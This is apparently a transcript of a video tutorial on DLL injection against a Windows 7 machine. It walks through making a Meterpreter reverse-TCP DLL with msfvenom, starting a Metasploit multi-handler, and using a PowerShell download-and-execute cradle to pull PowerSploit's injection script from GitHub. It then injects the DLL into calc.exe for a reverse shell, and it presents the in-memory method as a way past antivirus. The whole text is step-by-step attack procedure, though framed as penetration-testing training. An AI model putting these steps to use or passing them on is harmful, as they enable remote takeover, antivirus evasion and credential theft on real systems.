Hey guys, welcome. Today I'm going to be talking about DLL injection. This is going to be with a Windows 32-bit machine. Can work on a Windows 64-bit machine. So with that being said, depending on what box that you're going after, you'll probably have to do a little recon to understand the underlying operating system. With that being said, we're going to be using Meterpreter. We're going to be using a tool called PowerSploit, which was built by some really smart people, and we're going to be creating a handler we're going to be creating a payload using something called Venom. So to get started, this is our Kali Linux machine. The first thing we want to do, like I said before, is identify the target system, which we've identified already, and it's a Windows 32-bit Windows 7 machine. So we're going to use a tool called Venom, which is built into Metasploit suite. Venom has the ability to create different payloads that interact with the handlers built into the Metasploit modules. So the first command is Venom. This is going to open up Venom, and we'll put -p for payload, Windows, Meterpreter, reverse underscore TCP. This is going to create a payload built to basically call back to Meterpreter listening for a reverse TCP connection. If you were going after a 64-bit machine, you would then use the x64-bit Meterpreter reverse TCP payload. But in this case, we're just going to be using the Windows Meterpreter. So the next is the L host. So this matters. So if it's an internal system and you're internal, you'll use your internal IP address. However, if you are outside of the network and you needed to call back to, let's say, your house or your office or whatever you're doing the testing, you'll put the external IP address here and then set up port forwarding for whatever port that you designated. In this case, I designated port 81, but you could use the typical 4444 or whatever you want to do. The next is a -f. This -f is the file type, which we selected as DLL, and then we're piping it out to our root desktop with a file called Inject-dll. So when we hit enter, it creates a payload with all of what we listed here, and now we're kind of ready to go. So now it's getting now the next part is actually getting the DLL onto the device. So if you have, let's say, a netcat session or you have a remote desktop session, you can, with netcat, push it through netcat, or if you have like I said, remote desktop connection, you can maybe pull it down from a server that you're hosting, web server that you're hosting, or like say Dropbox, or if you have access to the box itself, you can maybe use a flash drive to upload it. So whatever the method you need to use to get it onto the box, that's the best method. So our next step is we're going to create the listener. So this is the Metasploit framework. So normally you would type in MSF console, but in this case we already have it started, and what we need to do is do exploit, use exploit, and then we're going to use a multi-handler. So the multi-handler is what's going to be listening for it, and we're going to set the payload to Windows Meterpreter reverse TCP. Hit enter. So now that that's set, we want to show the options, and these are going to be the options that we need to set for this particular payload to work. So on this end, we set it for port 81 and for localhost 149. So that's the same thing we'll do here. So we'll do set localhost 192.168.1.149, and we'll set L port to 81. Okay, so now we're ready to go. We'll just do exploit, and our handler is now listening. So I took the liberty to already pre-move the DLL over to the Windows machine. So let's step over there. Here's our test DLL here. This test DLL was the Inject-dll, just renamed it. So our next step is to go to GitHub, Power Mafia, PowerSploit, GitHub, and we'll see here where it says Invoke-dll.pss, PSS1. So this is the actual DLL. This is the actual program that we're going to be injecting. What this does is what I'm about to show you is we're going to inject this program right into memory. So that is going to kind of bypass antivirus from detecting it, which is pretty cool. So the path that we need to this is actually the raw path. So if we click raw, we'll see up here raw.github user content, and we're going to copy that link up there. Copy. So our next step is to open up PowerShell. Here's our PowerShell here. Now I've already took the liberty to enter the first bit of the string here, which is IEX space, and this is brackets here, new dash object net dot web client downloading, and then this is the string that we just copy and pasted, which is the shell mafia metasploit execution Invoke-dll. And we're going to hit enter. So if you did it right, there shouldn't be any errors, just like this. So the next step is to invoke, invoke DLL injection, and we need to set a process. So dash process ID. Now we don't really know what process to use yet. So what I like to do is I will open up a calculator and then open up another window and use the PS command to show all of the processes. And it looks like the calc is running on their process ID 4488. So we'll use the process ID 4488. And then the next is DLL. So our DLL is going to be the test DLL, and you can just kind of slide that right in. And that's pretty much it. So what should happen, looking over here at our reverse handler, when we hit enter, it should call back and create a Meterpreter shell. So let's hit enter. We see no errors. We see this test DL module, and then we look back. Here's our Meterpreter. So pretty awesome. We'll just drop into a shell, and we'll do who am I? And we are test domain test account. We'll go back here. Who am I? Test domain test account. So at this point, you basically have a reverse shell. You can migrate, dump creds, do whatever you want. Yeah, so happy hunting. Like, subscribe for more videos, and I'll see you in the pipes.